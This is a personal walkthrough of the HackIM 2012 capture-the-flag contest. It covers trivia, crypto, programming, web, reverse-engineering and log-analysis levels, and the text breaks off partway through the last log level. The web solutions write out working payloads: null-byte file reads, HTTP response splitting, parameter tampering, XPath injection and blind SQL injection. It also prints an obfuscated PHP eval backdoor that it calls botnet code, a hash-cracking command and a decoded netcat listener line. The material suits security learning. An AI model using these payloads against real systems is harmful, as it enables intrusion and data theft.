HackIM 2012 CTF Walkthrough

My Acknowledgement To:
Anant Shrivastava (infinity), Prashant KV (kvbhai), Dhanesh K (danny),
Riyaz Walikar (karniv0re), Murtuja Bharmal (void), Aseem Jakhar (@),
Rahul Sasi (FB1H2S), Pardhasaradhi CH (pardhu), Chaithu Rk (Antagonist),
Amol Naik (AMol NAik), Prince Boonlia (boonlia), Atul Alex Cherian
(Aodrulez), Pushkar Pashupat (push), Abhisek Datta (adatta), Ajit Hatti
(adh), Bipin Upadhyay (om), Hemanshu Asolia (h3m4n), Shannon Morse
(snubs) & Team from Hak5 - Trust Your Technolust

Few cheeky lines that will gear up the CTF thrill:
- Kitne level the, 35 sardaar.
- A computer, plenty of time, lots of patience and a challenging CTF, what else does a
hacker need to be happy?
- Don't cry at the beginning of the CTF. Cry at the end of the CTF.
- Unfortunately, no one can be told what the CTF is. You have to see it for yourself
- I know why you're playing CTF, Neo. I know what you've been doing... why you hardly
sleep, why you live alone and why night after night, you sit by your computer. You're
looking for the flag. I know because I was once looking for the same thing. I was looking
for an answer. It's the question that drives us, Neo. It's the question that brought you here.
You know the question, just as I did.

Before everything else, A word, in fact a request: Kindly avoid going
through this writeup before you have attempted with your wildest
idea, your weird assumptions, your hottest tools, craziest Einstein’s
formula, or a logic that never fails.

Brief Overview of CTF Layout:

CTF was divided into 7 sections, each with 5 levels of challenges.
1. Trivia Levels: Brain-teasers/Riddles
2. Crypto Levels: Mystified ciphers/Substitutions.
3. Programming Levels: Mathematical logic/Hash Cracking.
4. Web Levels: Redirection/ Injection.
5. Reverse Engineering Levels: PE /Apk/Memory Dump.
6. Log Analysis: Analyzing, pcap/scanner generated logs.
7. Forensics Level: Incident Analysis

Trivia Levels

Trivia Level 1

Official Hint: N/A

Page Source: Nothing Interesting

Description: This operating system also refers to a 1982 science fiction film, a board game, and
a song off the Prodigy B-Side "What Evil Lurks"

Analysis: A quick Google search with the keyword “scifi movie list 1982” revealed android as
the first result.

Flag: android

Trivia Level 2

Official Hint: N/A


Description: This fictional IPv4 packet header field was proposed in RFC 3514 as a means for
identifying packets with malicious intent.

Analysis: Google search with the keyword “fictional IPv4 packet header field” revealed the flag.

Flag: evil bit

Trivia Level 3

Official Hint: N/A


Description: This humorous RFC of the Internet Engineering Task Force describes a
communication and control protocol suite designed for allowing infinite numbers of monkeys
with infinite numbers of typewriters to produce the entire works of William Shakespeare.

Analysis: Google search with the keyword “communication and control protocol suite designed
for allowing infinite numbers of monkeys” revealed the flag.

Flag: RFC 2795

Trivia Level 4

Official Hint: N/A


Description: Metasploit was originally coded for what purpose?

Analysis: I can remember going through the book “Metasploit Toolkit” where it was mentioned
that metasploit was originally started as a network security game.

Flag: game

Trivia Level 5

Official Hint: N/A


Description: Released on April 1st 2003, this esoteric programming language uses spaces, tabs
and linefeeds to compose commands.

Analysis: Google search with the keyword “April 1st 2003 programming language” revealed the
flag as whitespace.

Flag: whitespace

Crypto Levels
Crypto Level 1: Ulta Pulta

Official Hint: poiuyt

Page Source: <! -- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled-
keyboard-computer-mirror1_VXLbh_24429.jpg"> -->

Description: Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy.
ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik
xwy qailki Oexjwok, 2 Ceaa Glyik

Analysis: The page source revealed the image of keyboard mirrored. Observing carefully each
character in the given string with the keyboard by mapping right side with the left and vice versa.
Flag was revealed.

Keyboard Mapping:
3 == 0
- == 2
. == ,
q == p
a == l
z == m

Flag: Windows 2000 already contains features such as the human discipline component,
where the PC can send an electric shock through the keyboard if the human does
something that does not please Windows. - Bill Gates

Crypto Level 2: White Noise

Official Hint: Follow the White Rabbit: P (by spnow)

Page Source :<! -- md5sum: b80a5ce8b0c6c57a0258f34dd5905970 -->

Description: shhhkoinahihai

Analysis:
First Attempt (leet way):
I went through the wikipedia about Whitespace (programming Language) and got and idea that
the given whitespace contains tabs and space which must be replaced by 1 and 0.
1. Copied the whitespace to gedit (text editor).
2. Replaced the tabs with 1 and space with 0.

3. Got the following sequence of 0’s and 1’s

4. Now, this binary sequence needs to be converted into something meaningful, therefore , I
google for “binary to text translator” and got an online tool at
http://home.paulschou.net/tools/xlate/
5. Translated the binary sequence but to my surprise, I couldn’t get any meaningful
information  Where did I have it wrong?
Second Attempt (leet way):
6. After I thought, came to conclude, how about replacing tabs with 0 and space with 1?

7. There, got a new sequence, with expectations.

8. Again I used the same binary to text translator, and Voila!!! There was our Flag

Alternate Method:
The above method seems to require lots of hard work precisely.
Thus, we can even solve the above problem with this alternate way:
1. Copy the whitespace to gedit (text editor) and save it.
2. In linux there is a utility called as “tr” utility to translate characters.
3. Type : cat whitespace.txt | tr "t " "01" at terminal.(Note:there is space after t)

4. There is our binary sequence; again we can copy it up in the binary to text translator to
get the flag.

Flag: Error Message: Your Password Must Be at Least 18770 Characters and Cannot
Repeat Any of Your Previous 30689 Passwords - MS KB 276304

Crypto Level 3: The Base Test

Official Hint: http://lmgtfy.com/?q=RFC+for+base+encoding

Page Source: ====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====

Description: N/A

Analysis: I went through RFC 4648 twice, but didn’t find anything highly influencing that could
eventually get me to the flag. However got a very basic idea about the patterns of various types
of base encodings.
My assumption on the given string was:
- Rot-13
- Reverse
- Base64
- Base32

Went past through combinations of several of the above assumptions, and finally got the flag
with the following steps:
1. Remove = from both the ends of the given string.
2. Reverse the string.
“JVJDEVZWKZCFGTSGIRLUWVJTJJHFMUKXLFMUYT2NKJEEOTZSJRK
U4RJ5HU6T2PJ5”
3. Apply base32 decoding
“MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======”
4. Again apply base32 decoding with the result on Step 3 , to get the flag.

To reverse the text: http://textmechanic.com/Reverse-Text-Generator.html
To decode base 32 :http://online-calculators.appspot.com/base32/

Flag: duoTriGeSimalandNgiti

Crypto Level 4: Elucidate

Official Hint: N/A

Page Source :<! -- md5sum: ad4e2705406ef1197f03f93474e30020 -->

Description: Elucidate

Analysis: Nothing seems to be better than sleeping rather than go on decoding those obfuscated
php script. The first laziest thing that I decided to do was to look for an online tool that would do
the job without requiring going through several decoding steps.
Eventually I came across an online tool:
http://www.whitefirdesign.com/resources/unobfuscate-php-hack-code.html

Now back to analysis part again. Let us understand the script in part wise:

<? php
$vaa8089358f2="x62141x73145x3664x5f144x65143x6f144x65";@eval
($vaa8089358f2 ("**base 64 encoded string**"));
?>

- On the first line, a variable is being set to a string that’s being represented by a mix of
hexadecimal (‘x’) and octal (‘’) escape sequences. Python uses the same escapes as PHP for
hex and octal, so it’s easy to use python shell to see a “normalized” ASCII representation of
these strings:
Python Shell Below:

>>> "x62141x73145x3664x5f144x65143x6f144x65"
'base64_decode'

- Next idea was to decode the base64 encoded string.
- I used the online tool mentioned above and got an unformatted php script.
- A quick Google search revealed that there was a php formatter at
“http://www.prettyprinter.de”
- So by this time I had decoded the base 64 encoded string with proper formatting.
- On further analysis found another obfuscated script:

@eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc
8b9a2789e95fa("yIIgnkcORC4eT5SRD0cho3s2WqMVXWozH4hRSSXY7B0YBDtdngd0cs+9f96rZnyjS/jj7hmZZ
8+87M2sTxT1NWZoRJljzDMMXNUXppQ/rLQG89Uy+9UlsxyVrWmoGozLR7ilMhAai8gyemgw0aVKsNMFMeo
j3UOjhsR6TP2Z4WVZvIzgmX9r/6j7l6mw1agjlawTPb9kZk08qlP08gXt8pxW2txJNVWt1uyqrZoOHyAjLA4Xd6la
nOsZj9e3lE9Fuy4bU/mZC5KemoeKUXECwb/WHKBDPY7lz8sIiNb2VU9Wq+MfSvwmzzxnphJxlvz3XtCOsSRL
mc/mUHEd5KcJUMfe1L8OjjXYn+/oSAnfxD7jKTxVNLWEmuLDzZL7omK1VavnU6kDb1C0nx7123qZguxg1v3+
xVMqCZ43iJoxENOxGzaOAA5zDFxXwzMZOthn+4XYQZCC/H9lIl6iIin+/BSG0Mf9310hya7rLywnQBBV3S1/h
Mc8+UE9B764+Uj7aalqKA+ZlpHY/LsW+Bcz3PqUjlUMeO79bsS67a7wzYKhscgvTBp+4bF0TV2mSxTeEJzBnu8
J623YhwZrQTZf94R5de1JCTAXpfLY5KVyIrk0M/bxjcFPDTzaISXHrMXb5/a0FGXHtOY1VgecMP/kmSRdCAAx
k/ojrAVaJrfy+bSRPFu5MIsw1UT2RiRRIYmvsGkUC+Fj8ks5Uu76Nni47+ARaclzp4jQFIY0MkIrUFslxscIUvmcV
qaeINrbpVI/unqFCWUlwirlfd9krZYM+r3k2gLeF/nv4uUmSP7Sf8/8EA0KyhkGsI7HZ/fsQ2QiGQhQ3p687p2CZ
+yklj4fKEmJcfq2JQ3vaqGGBwsxkhu0F81tXcT67WlED2M5BmZ2eDq2dkLqMC6z720S66eSxPLAAunJ1jgEAKN
737geMYA9xjMxqCxC"))));

- And there was another base 64 encoded string inside it.
- Now the online tool comes into play. The above script is of the form:
- @eval(gzinflate(base64_decode(str_rot13("base64_encoded”))));

- The output revealed some kind of bot net behavior, however at this point I was least
bother about this fact, and kept on observing it.

- A quick overview of the output attracted me with following variable:

- $_4fa3332ef3d19e9840387434b8d28780 =
"x6f156x6c171x62171x6f142x73145x72166x69156x67164x68151x73143
x6f156x64151x74151x6f156x77157x75154x64164x68145x72145x73165x
6c164x73157x66157x75162x77157x72153x62145x72145x67141x72144x
65144x61163x66165x6c154x79143x6f156x63154x75163x69166x65141x6
e144x61163x68141x76151x6e147x65154x75143x69144x61164x65144x74
150x65156x6f162x6d141x6c143x6f165x72163x65157x66164x68145x701
50x65156x6f155x65156x61";

- Hoping this would be the final step, I used the python shell, In case if anyone doesn’t
have python installed, Google App Engine for python would really be helpful at
http://shell.appspot.com/ , or may be there can be multiple ways to decode that 
>>>"x6f156x6c171x62171x6f142x73145x72166x69156x67164x68151x73143x6f
156x64151x74151x6f156x77157x75154x64164x68145x72145x73165x6c164x73
157x66157x75162x77157x72153x62145x72145x67141x72144x65144x61163x66
165x6c154x79143x6f156x63154x75163x69166x65141x6e144x61163x68141x76
151x6e147x65154x75143x69144x61164x65144x74150x65156x6f162x6d141x6c
143x6f165x72163x65157x66164x68145x70150x65156x6f155x65156x61";

'onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavin
gelucidatedthenormalcourseofthephenomena'

Flag:
onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandas
havingelucidatedthenormalcourseofthephenomena

Crypto Level 5: Yeah! As you guessed, it’s Steganography

Official Hint: Yeah! As you guessed, it’s Steganography

Page Source :

Description: Llun Saving Bank is fed up with known encryption standards to store the data.
They decided to reinvent the wheel. Can you decode the data?

Analysis: Close looks with the initials of title “Llun Saving Bank” suggest LSB. I didn’t know
much about LSB encoding technique in text; however I have come across one with image in
some war-game. I had a look over LSB on wikipedia and got an idea to include the rightmost bit
of each character. I converted the given text into binary and whoa, I was left with long list of
binary. This was a real challenging job to get the rightmost bit. Therefore a simple python script
made my task easier:

result = ''
ciphertext = '<paste binary here>'
for i in range(7, len(ciphertext), 8):
result += ciphertext[i]
print result

Note: My python script assumes the binary with space between each word. Something like
“01001000 01110011 00100000…….” And so on.

On executing the python script, I was able to get the LSB of each character to which I converted
to ASCII using http://home.paulschou.net/tools/xlate/, and there was our flag in plain text.

Flag: Learn howto Hide in Plain Sight

Programming Levels

Programming Level 1: ROTOMATA

Official Hint: N/A

Page Source :<! -- We only know the first 6 characters: "Men at" -->

Description: Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm
nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit

Analysis: I really didn’t spend much time on decoding the whole string. Rather analyzed the
difference between first three words, and then google for it.

M-M=0
e-f=1
n-p=2

space=3

a-e=4
t-y=5

space=6

s-z=7
o-w=8
m-v=9
e-o=10

Hence, the first three words, that I obtained was “Men at some”. After I google it, I got the
famous quote by William Shakespeare, which was the flag.

Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our
stars, but in ourselves, that we are underlings

Programming Level 2: Pascal’s Triangle

Official Hint: N/A

Page Source :<! -- ex: The sum of all middle terms till first 6 rows is 9 -->

Description: The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle

Analysis: This seemed to be easy at first sight. My first expectation was to get some cooked up
code but that really didn’t worked out, to hell all I got was algorithms and some frustrated guy
like me crying on the discussion forums to get their erroneous triangle code worked out. Googled
Pascal triangle went through wikipedia about Pascal triangle, wolframalpha- Pascal triangle,
Frustration takes you at any height of paranormal activities. After spidering and crawling through
the links, came across some useful resources:

http://rosettacode.org/wiki/Pascal's_triangle
http://www.mathsisfun.com/pascals-triangle.html
http://www.mathwords.com/b/binomial_coefficients_pascal.htm
http://www.youtube.com/watch?v=OMr9ZF1jgNc

-. So all up, time to do some serious coding.
- The challenge considers the middle term of odd rows.
- Wrote a code on c and hoped it would worked out, failed 
- Looked for some java code, compiled successfully, but when I executed it, I was staring on my
LCD, the program went on running for more than 30 seconds on my i5, that was stack overflow.
- Time for some manual again, overlooked and realized that binomial coefficients can be
essential to get me the flag.
- Worked out again for the 3rd time now in python, with unexpected hope, executed it got
something, and voila!!! that was the flag,

This was the python script:

#!/usr/bin/python
from math import factorial
p=0
s=0
for n in range(0, 1337, 2):
s += factorial(n)/(factorial(p)*(factorial(n-p)))
p += 1
print s

Flag:4365932474188423707093600683230364311423941198777278660206654343120587216
667436233239359631257671906424254797004032326756653034333310397082007259357870
623427662432460587818667097226705645987145656659456934356498862160032628647508
069786551862253737753435645565104842509752373488183866315706330467111008238321
829445373767874422156015835789685633070319435688289548287438365157627110284786
6170999680296497

Programming Level 3: Your Brainfuck Sir...

Official Hint: N/A

Page Source :<! -- md5sum: 4f1ec9481c0f0ae0a199ea5c8dedf62d -->

Description: Debug bfcode to get the flag

Analysis: I had encountered brainfuck earlier but never this way. A Google search for brainfuck
interpreter resulted in http://www.iamcal.com/misc/bf_debug/ . Executed the given code without
any input in the interpreter and observed the result. Something appeared partially which doesn’t
seem to throw any useful meaning. Tried with some random input and got the same output again
and again. May be defect with the interpreter, LOL. It’s MANUAL time now.
Glanced across the lines in wikipedia about the brainfuck programming. There I got to see the
small “Hello World” program. I executed it in the interpreter, and got the output successfully.
Observed the “Hello World” in brainfuck where each line was ending with a period. Period has a
special meaning in brainfuck programming. It is same as print statement which the given
brainfuck code was missing.GOT IT!!! So appending a period at the end of each line was all
about getting the flag.

Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs
after you..

Programming Level 4: Substitute Problem

Official Hint: N/A

Page Source :<! -- md5sum: 31178aa23ef43566009d97f38a470279 -->

Description: deobfus

Analysis: There wasn’t much to do with this; everything was self explanatory in the page itself.
The only thing required with this challenge was plenty of time with lots of concentration.For me,
It nearly took continuous 2 hours to get through all the iteration. Probably some hardcore
programmer would have written a simple code to get it done in few seconds. So mine time
complexity with this problem was exponentially equivalent to one with the programmer’s.
Final iteration revealed the code as:
SEDULoUSLY ESCHEw oBFUSCAToRY HYPERVERBoSITY A
N D P R o L I X I T Y 8 4 R o E D Y GREEN
On attempt with variation of case, got the final flag.

Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green

Programming Level 5

Official Hint: N/A


Description: A pinch of salt for your coffee, Sir?

Analysis: I’m really bad at brute forcing and guessing un-natural passwords. With hope to get it
correct this time, I went to salt.asp page and generated hash for few random keywords. Sorry
wouldn’t share those, crazy ones, nearly killed my system with overheating: D
The basic idea was to crack the hash and identify the salt which was the flag to complete this
challenge. I looked around for the md5 cracker and got one at http://3.14.by/en/md5. Next i tried
to crack the hash for the random keywords. After a while, my system temperature went above
critical level and had to shutdown the process, that was really disgusting job to watch over the
LCD and wait for the cracker to do its job, the cracker doesn’t seems to understand that my
system is not a blade server or may be I don’t. On a final note, I decided to take hash for either
single word or digit and crack it. Again the same boring task, at first set I generated the hash
from 0-10, and finally on second attempt with the hash for “1” I got my flag.
Working Steps:
1. On the page salt.asp input password as 1.
2. The hash thus generated for my system was “243dc4f11700aa3bd6c7de312bb0ca31”
(Note: each system will generate a unique hash).
3. Fire up the windows console , and type the following at the command prompt:
barswf_cuda_x32.exe -h 243dc4f11700aa3bd6c7de312bb0ca31 -c 0a

4. After approx 2 minutes on my i5, the cracker successfully displayed the result.

5. There we had our key as : “1c183e7”
6. That means "1" + "salt("c183e7"). Since hash = Algo(password+salt)
7. In the given problem, 243dc4f11700aa3bd6c7de312bb0ca31=md5(1+c183e7)
8. And finally my flag was c183e7( Note: Each system will have a unique flag)

Flag: c183e7

Web levels

Web Level 1

Official Hint: N/A


Description: Can you view the bytes in password.asp from Me?

Analysis: As the description suggests, it was null byte injection. I had come across a problem on
null byte on one of the wargame.Let’s understand the problem. Our challenge was to read the
information from the file password.asp which somehow was protected by the server. Here we
can observe in the given URL that default parameter is test.txt, Multiple questions can arise here,
as such, why only test.txt as the parameter? If you don't do anything with a parameter, why take
one? Assume a real time application from my perspective, the idea with this level is that: We
have an application which takes a filename from us, reads it, and shows it to us. We found an
example of input, "test.txt".We know there is sensitive information in password.asp, But we can't
get password.asp. So let's imagine that whoever wrote this application which reads any file we
tell it to, wanted to keep us from reading anything but files which end in ".txt".So any input
which we give it that doesn't end in ".txt" is rejected. So here's the problem: How do we get a file
which ends in ".asp" when the filename we provide has to end in ".txt"?
The answer obviously is null byte but that would be a partial answer in the context of the
question “HOW?” In languages like ASP and PHP, the null byte doesn't end a string, it’s just
another character. In C-based languages (C, C++, C#) a null byte means the end of a string. So if
we give a PHP script a filename to open that has a null byte, it's different in PHP and in the OS.
So the filename might be "hello%00blah" to PHP. But it would be "hello" to the operating
system. Some applications append a file extension to the end of any filename we give them. So
we give them "hello" and they open "hello.txt" .Which is why we do “hello.php%00”. Because
PHP sees "hello.php%00.txt" and the OS sees "hello.php".
And after this long boring, worthless explanation, hence the flag.

Flag: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=password.asp%00.txt

Web Level 2:

Official Hint: Judgment of Solomon


Description: Can you redirect ME to hackim.null.co.in?

Analysis: I had to go through the hint to get this one done. After few attempts with variation of
parameters, arbitrarily I had to go through the boring story on wikipedia. The summary of story
was, “Solomon suggested that the baby be split in half and each half given to one of the women
claiming to be the mother”. So, the hint refers to the word "split". On quick search with the string
“HTTP Splitting” returned several results. Studied few of them, showing various PoC’s and
realized that I had spent most of my time injecting the http response rather than redirecting it.
Hence finally I got the level done with several parameter variations.

Flag: http://www.nullcon.net/challenge/wlevel-2-
proc.asp?page=%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in

===========================================================================================

Web Level 3:

Official Hint: Proxies are golden friends

Page Source :<! -- If you're still reading, better register Mate :)-->

Description: Click here to Login || Click here to Register

Analysis: In this level we were entertained with two options, register and login.I clicked on both
of them and went through the page source, nothing seemed interesting. Had a thought that it
could be vulnerable to some kind of injection. On next step I filled up the form and register,
Wow my registration my successful, didn’t expected though.But on login with those credentials
all I got was an error message “Only ADMINS are Welcome!”.Came back again on the
registration page and tried with another input. There I observed the page source, and cool there
we had something interesting this time, in this format:

So, it was all here, the parameter with admin:no was passed into the database. Now there was not
much to do, next I used burp suite to check how the parameter were passed.

On the last line we can observe inside the window how parameters are passed to the server. This
format was similar to earlier as what we got on the post registration page source. So all we had to
do was add admin:yes as per the format. Even this process annoyed me a lot, since on single
attempt I couldn’t get it correct.

So, the correct format was:
username=me.admin&name=admin&password=admin&email=admin%40localhost.com|admin:yes&Submit=Register

And finally I registered myself as the admin, and got the flag.
Flag: b3149ecea4628efd23d2f86e5a723472

Web Level 4: Can You Get Me all the Data?

Official Hint: if you think you've seen all the data, i'm afraid you're mistaken


Description: 2007 && 2002

Analysis: At the beginning of this level, I was getting no idea at all for what really was required
with it. After hovering with the links around for few hard hours, I got a cool link on OWASP:
https://www.owasp.org/index.php/Interpreter_Injection
There were few interesting attack vectors which foolishly I tried, in vain had no luck. I noticed
the description again and understood it was asking to reveal data from the server and then I
realized that blindly I tried with those injection parameters. On my next attempt I went on
looking for cheat sheet on various attack parameters. I collected few of them and studied those.
Those were beyond my understandings. Helplessly shouted in the IRC and got some clue, clue
which again required traversing blindly. Eventually I came across an article:
http://palpapers.plynt.com/issues/2005Jul/xpath-injection/ which described xpath injection is
simple understandable language and then a good cheatsheet over here:
http://www.simple-talk.com/dotnet/.net-framework/xpath,-css,-dom-and-selenium-the-rosetta-
stone/
I tried with those attack vectors, and got the flag unexpectedly with this one:

input='] | /* | /foo[bar='

I completed this level blindly, a bad one.

Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear

Web Level 5:

Official Hint: It’s SQLi


Description: Do You Have What IT Takes to Break into the World's Most Secure Login
System?

Analysis: The very first thing anyone would try out after looking at the page at one sight was the
very common SQL Injection (“ or 1=1--) and yes I was on the same side of the coin. As usual I
was wrong again. Assuming it to be a blind SQLi, looked around www.1337day.com and
www.exploit-db.com in hope of getting some good papers. On the very first link of exploit-db I
got to see a paper on advanced blind sqli, went through it and there was some attack vectors
against web firewalls. With positive hope tried and with the second attempt using '<>'1 as the
username and password made it to the flag.

Flag: 47c1b025fa18ea96c33fbb6718688c0f

Reverse Engineering Levels

Reverse Engineering 1: Basic Test

Official Hint: N/A

Page Source: 

Description: justdoit.exe

Analysis: The given binary seemed to be suspicious. So before executing it I decided to analyze
and verify if it was safe to execute. I dumped the binary into hex editor and observed it. The
headers showed that it was UPX packed. I unpacked it using “Universal Extractor” and went
through it again, no conclusion, finally executed it inside the vmbox and analyzed the behavior.
At first instant I couldn’t get anything from it, executed it few more times and saw automation
done by the exe. Then I went to google and searched for the string “keyboard automation” and
there first option showed AutoHotKey.Eventually ended up looking for Exe2Ahk at
http://www.autohotkey.com/download/Exe2Ahk.exe
After successful decompilation, found the flag in plain text.

Flag: We could talk all day about what AutoHotKey can do for an online poker player

Reverse Engineering 2: Ask nicely, it will give you what you want

Official Hint: Take another path.. in general look for interesting code blocks & execute them..
code can be anywhere in the PE, even in data | Resource? No Resource

Page Source :<! -- md5sum: c786287c7825784a85413695a9e319fc -->

Description: HackIM.exe

Analysis: I consider this as the most insane level in the whole CTF competition. Nearly spent
two hacking days to get past through it. To understand the binary, I nearly downloaded all the
tools found in google having the string “PE”, went through various articles on Reversing PE, and
nothing worst than that shifted to 3 different debuggers one bye one. Ultimately after tracing the
flow of program for several times in the Olly debugger, following steps concluded the flag:

1. As the hint was suggesting, “No Resource “, I loaded the PE into Resource Hacker to see
if what exactly its meaning was. Encountered the following error.

So it was clear from this error that, there was something wrong with the resource section.
2. I turned up into Olly debugger, loaded the PE and went to the memory window (ALT+M).
3. At offset 0040C000, there was the .rsrc (resource) section. I changed the access to the section
from Read to Full Access.

4. Tried running the program but couldn’t get anything desired. Popped over the hint again
and there it was asking to execute the resource section.
5. So now it was time to place the jump instruction somewhere so as to execute the resource
section.Came back to CPU window (ALT+C).
6. Just below the program entry point, at offset 00401273 there was a JMP instruction.

7. So all I had to do was place the jump over the resource section which was the offset
address 0040C000.

8. And finally running the program I got the flag in the messagebox.

Flag: AreYouHappyNow?

Reverse Engineering 3: null Mobile Android App

Official Hint: N/A

Page Source :<! -- md5sum: fd81ba87c0edc1f37250e680a49260d8 -->

Description: We’re proud to announce the null Mobile Android App Project; however the
application is currently in Beta Phase and requires lot of attention from the testers. In keeping
with the spirit of HackIM we've hidden a Flag inside. Your task is to find the Flag.

Analysis: I didn’t have much hard time with this one as of before. I unpacked the apk file with
Winrar and went through the contents. Inside folder res>raw there were two files code.js and
junk.php. The JavaScript inside code,js was in unformatted state. I formatted it using
http://www.jsbeautifier.org and went through it, couldn’t get anything interesting. Next opened
the junk.php file in Ultraedit and after a careful observation there at line 72 I got to see the
packed javascript function, finally an online tool at http://www.strictly-software.com/unpacker
helped me to unpack the javascript function, revealing the flag inside it.

Flag: Do not let what you cannot do interfere with what you can do.

Reverse Engineering 4

Official Hint: we’ve updated the binary with hints, request all to download again to proceed

Page Source:
<! -- md5sum: 7c87b2bfe4e02dbb32e2c3067cb93692 -->
<! -- <center><h3><a href="data/script">script</a></h3></center>
<! -- md5sum: 849f2d8c6e22604cba8fe4904803de10 -->

Description: REL4 UPDATE: WE have updated the binary with some hints inbuilt, Request all
to download new RE binary to proceed.

Analysis: My first attempt with the given file was to analyze its type. I used the file identifier
called TrID File Identifier also available online at http://mark0.net/onlinetrid.aspx. The result
showed up that it was an ELF binary. So I cross verified it on the terminal:

It showed up that the binary was stripped. Tried executing it and was entertained with the
following error.

I tried with strace and ltrace command but couldn’t learn much from those outputs.
The error indicated something about time machine, so I turned up in google and looked for
anything interesting on time machine, however couldn’t find anything to help.
The next thing I did was to change the system date to some back year. I changed it to year 2000.
Tried executing the binary again, and voila there was no error but even no flag. Tried giving
some parameter but that too didn’t help anything. Next I opened the new terminal and tried
looking into the current processes running using the command ps –aux and got a long list. It was
difficult to figure out so again tried filtering it using the command: ps –aux | grep script2 and
whoa, unexpectedly got to see the some shell script. Went through it, and there our flag was in
plaintext.

Flag: Nature has neither kernel nor shell; she is everything at once

Reverse Engineering 5: Got Dumped :(

Official Hint:

Page Source :<! -- md5sum: 043e4cc85c519723fad18dce7502371c -->

Description: lol.rar

Analysis: This challenge was about the crash dump analysis. I opened it in hex editor and went
through the few lines got an idea that it was a windows crash dump. Next I installed Windbg
with proper symbol configuration and loaded the dump into it.I was unaware of any such
analysis and went through few links on google. Got some good information and few cheatsheets.
Ultimately the following steps help me to understand the dump.
1. First we had to recognize the file that caused the crash. Command: !analyze –v showed u
that stub.exe caused the crash.
2. Next we had to extract stub.exe from the dump to analyze it.So for this there is a sos
which is used for .NET debugging( to dump dll and exe).
3. .load clr10sos.dll
4. !sam folder_location
5. Now we had stub.exe. Next I loaded the stub.exe into Olly dbg. Step into the instruction
and realized that the jump was passing to the crash portion of the assembly. Tried to
bypass it by jumping it to the messagebox function. I got the messagebox but there was
no flag in it. Again went back to windbg and checked for the PID since there was a
GetProcessID function in the assembly. I got the PID as 0xA60 then I patched the
GetProcessID to return 0xA60 and finally got the flag.

Flag: TheLastSamurai

Log Analysis
Log Analysis 1: Basic

Official Hint: N/A

Page Source :<! -- md5sum: 1e2612e8ff3d4651c7d5fc67f2797906 -->

Description: report

Analysis: In this challenge the log was not too large but took a long time to understand. Every
line had a cool piece of information. On carefully observing through the lines, I found
something very interesting on line number 31:

+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled:
/challenge/logically_insane/

Checked into it and wow found two files, but at the very next moment, realized that the game is
still on. Said “Ask the proper question to get the proper answer”. Went on the page source and
got some more closer to the flag, there was a hint given on comment:


And to my surprise with my very first guess, I got the flag. HAPPY!!!
The final URL was:

http://nullcon.net/challenge/logically_insane/askmelater.asp?question=flag

Flag: 6bb61e3b7bce0931da574d19d1d82c88

Log Analysis 2: Mystery Password

Official Hint: N/A

Page Source: 

Description: log3.pcap

Analysis: There wasn’t much in this challenge. The log was unexpectedly small and within few
minutes anyone could solve it. I opened the log in wireshark. The easiest way was to learn the
log was to see the TCP stream. Right Click on the log window > Follow TCP stream, popped up
the TCP stream window. The very last line of the stream content revealed the password and with
next few attempts I got the flag.

Flag: ..Supp@..adm1n

Log Analysis 3: Clever Intruder

Official Hint: N/A

Page Source :

Description: access.rar

Analysis: A 25MB log with approx 1 lakh lines. Seemed nearly impossible to analyze it, so
thought for a while and looked around google for some good log explorer so as to make task
easier, got few but they were all useless, I wasted my time, came back to my old favorite
Ultraedit and gave a quick glance through the lines. Learnt from the logs that:
- Logs were generated from different scanners.
- There was variation in IP.
- Scanning was performed on same date between fixed period of uninterrupted time.
- The HTTP Status Code for most of the request was 404.

Hence the last finding proved to be essential. Assuming we couldn’t find anything interesting
from a “Page Not Found” error. I tried my level best to separate all those logs to different tabs in
ultraedit.This was really a very hectic job, had I got some more knowledge wouldn’t be tough to
get past this hurdle easily. This level really made me realize how poor I m.After a long hours of
assumed work, eventually came across the line with an encoded base64 string
“bmMgLWwgLXAgNjY2Ng==” and on decoding got “nc -l -p 6666”. On the original log, this
was on line number 37409 (Ultraedit).

Flag:

Log Analysis 4:

Official Hint: Exploited!!!

Page Source :

Description: CVE of the Exploit is the Flag

Analysis: This challenge was all about finding a CVE exhibited by the content in the log.
As mentioned it was a burp suite log. To make the view easier, I renamed the log file into
log.xml and opened it in web browser. Again this log had many 404 Not Found Requests.After
going through first few lines, came across the logs of Tikiwiki, there was other logs of joomla,
but I preferred to go sequentially. Since I m not good with exploit identification. I browsed to
http://nvd.nist.gov/ and searched CVE for tikiwiki. Most of the result returned CVE related to
XSS but in our log I couldn’t see any such XSS thing, so went with exceptions, and eventually
got the flag. Honestly I couldn’t understand which line in the log referred to the CVE, but I had
an answer for the question.

Flag: CVE-2005-1921

Log Analysis 5: Waat Laga Server

Official Hint:

Page Source :<! -- md5sum: c641fa00c0a84fd8fd954b3e75d5d6c8 -->

Description: dump.rar

Analysis: Again 95 MB of logs, loaded it into wireshark and tried for few minutes to look into it,
looked at first few lines and last few lines, honestly didn’t understood, as it was really difficult to
browse through each lines one by one. Tried to find some alternate way and couldn’t learn much
all I got was some bogus ads for shareware log explorers asking for $$$.Came back to
description again and noticed that for 3rd flag name was required. Googled for the string “Local
Privilege Escalation Exploit” and the search resulted some exploit-db papers. The interesting
thing I noticed that was CVE that may help me with author identification. Next challenge was to
